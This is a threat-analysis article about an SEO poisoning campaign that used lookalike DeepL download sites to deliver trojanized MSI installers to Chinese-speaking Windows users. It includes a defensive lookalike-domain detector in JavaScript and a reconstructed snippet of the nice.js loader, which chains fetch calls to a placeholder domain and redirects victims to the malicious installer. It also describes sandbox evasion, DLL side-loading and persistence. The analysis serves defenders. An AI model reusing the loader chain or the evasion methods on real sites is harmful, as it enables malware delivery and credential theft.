In August 2025, security researchers uncovered a sophisticated SEO poisoning campaign targeting Chinese-speaking Windows users.
By manipulating search result rankings with tailored SEO plugins and registering lookalike domains, attackers successfully masqueraded malicious software download sites as legitimate providers.
Victims searching for popular applications such as DeepL were redirected to spoofed pages bearing minimal character substitutions and convincing language, prompting them to download weaponized installers instead of genuine software.
This technique allowed threat actors to reach a broad audience without requiring direct phishing emails or social engineering beyond the fake domains.
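As an added defender-side example (not code from the Fortinet report or the campaign itself), the JavaScript below flags domains that imitate a legitimate brand through a confusable character, a single edit, an embedded brand name, or a swapped TLD, the kind of minimal substitution this campaign relied on. The `LEGIT_DOMAINS` allow-list, the `CONFUSABLES` table, the function names and the sample domains are all assumptions constructed for the example.

```javascript
// Added example (not from the Fortinet report): flag domains that imitate a
// brand via confusable characters, one edit, an embedded brand, or a swapped TLD.
const LEGIT_DOMAINS = ["deepl.com", "google.com"]; // assumed defender allow-list

// Visually confusable sequences folded onto one canonical letter before comparing.
const CONFUSABLES = [["rn", "m"], ["vv", "w"], ["0", "o"], ["1", "l"], ["i", "l"], ["3", "e"], ["5", "s"]];
function normalize(label) {
  return CONFUSABLES.reduce((s, [from, to]) => s.split(from).join(to), label.toLowerCase());
}

// Levenshtein edit distance using a single rolling row.
function editDistance(a, b) {
  const row = Array.from({ length: b.length + 1 }, (_, j) => j);
  for (let i = 1; i <= a.length; i++) {
    let diag = row[0];
    row[0] = i;
    for (let j = 1; j <= b.length; j++) {
      const tmp = row[j];
      row[j] = Math.min(row[j] + 1, row[j - 1] + 1, diag + (a[i - 1] === b[j - 1] ? 0 : 1));
      diag = tmp;
    }
  }
  return row[b.length];
}

// "www.deep1.com" -> { label: "deep1", tld: "com" }; null if not a dotted name.
function splitDomain(domain) {
  const parts = domain.toLowerCase().split(".").filter(Boolean);
  return parts.length < 2 ? null : { label: parts[parts.length - 2], tld: parts[parts.length - 1] };
}

// null for an allow-listed or unrelated domain, else the imitated brand and why.
function checkDomain(candidate) {
  const c = splitDomain(candidate);
  if (!c) return null;
  for (const legit of LEGIT_DOMAINS) {
    const l = splitDomain(legit);
    if (c.label === l.label && c.tld === l.tld) return null; // the genuine domain
    if (c.label === l.label) return { brand: legit, reason: "tld-swap" };
    if (editDistance(normalize(c.label), normalize(l.label)) <= 1)
      return { brand: legit, reason: "confusable-label" };
    if (c.label.includes(l.label)) return { brand: legit, reason: "brand-embedded" };
  }
  return null;
}

// Triage a batch of domains observed in DNS or proxy logs (constructed sample input).
function triage(domains) {
  return domains.map(d => ({ domain: d, ...checkDomain(d) })).filter(r => r.brand);
}
```

Feeding newly observed DNS or proxy domains through `triage` gives a short review list; the `reason` field tells the analyst which substitution trick to look at first.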
Fortinet analysts identified multiple fraudulent domains ranking highly in search engines, each designed to distribute a combination of legitimate application binaries and malicious payloads.
Upon visiting one such site, a JavaScript-based loader named nice.js orchestrates a multi-step download process that dynamically retrieves JSON responses to determine the final installer URL.
This seamless injection of malware into the installation flow makes detection by casual users virtually impossible.
The stolen credentials and system data collected by these weaponized installers can then be leveraged for further compromise, lateral movement, or sale on underground markets.
The impact of this campaign extends beyond simple credential theft. Once executed, the MSI installer elevates itself to administrator privileges and drops several components—including a debug-linked DLL, fragmented ZIP archives, and auxiliary files—into system directories.
An anti-analysis routine within the primary DLL conducts parent process checks, sleep integrity verification via HTTP date queries, and ACPI table inspections to evade sandboxing and virtualization environments.
Only after these checks does the malware reconstruct and decompress its payload, ensuring robust deployment on genuine end-user machines.
Infection Mechanism
The core of the infection mechanism lies in the nice.js script embedded within the spoofed sites.
Upon page load, the script executes the following request sequence:

```javascript
// nice.js request chain as reported: deviceType and currentDomain are
// populated by the spoofed page before the first request is issued.
fetch(`https://spoofeddomain.com/api/download?device=${deviceType}&domain=${currentDomain}`)
  .then(response => response.json())                   // first JSON hop: yields secondaryLink
  .then(data => fetch(data.secondaryLink))
  .then(response => response.json())                   // second JSON hop: yields finalUrl
  .then(data => window.location.href = data.finalUrl); // redirect the victim to the installer
```
This chain of JSON-based redirects not only obscures the malicious content delivery but also allows the threat actor to tailor payloads based on the victim’s device type and domain origin.
Once the user is redirected to the final URL, the MSI package bundles a legitimate DeepL installer with the malicious EnumW.dll, whose embedded debug path points back to the attacker's build system.
EnumW.dll is launched through a Windows Installer custom action that calls its ooo89 function, which runs the anti-analysis checks before any payload is extracted.
The fragmented ZIP archives (temp_data_1 through temp_data_55) are reassembled into a single emoji.dat file, decompressed, and deployed under a unique directory named plsamc{systemUptime} in the user profile.
The malware then locates a sibling EXE and uses it to side-load a packed vstdlib.dll, which provides persistence and complicates forensic analysis.
The attack flows from the initial search result to the final payload execution, highlighting the stealth and sophistication of this SEO poisoning operation.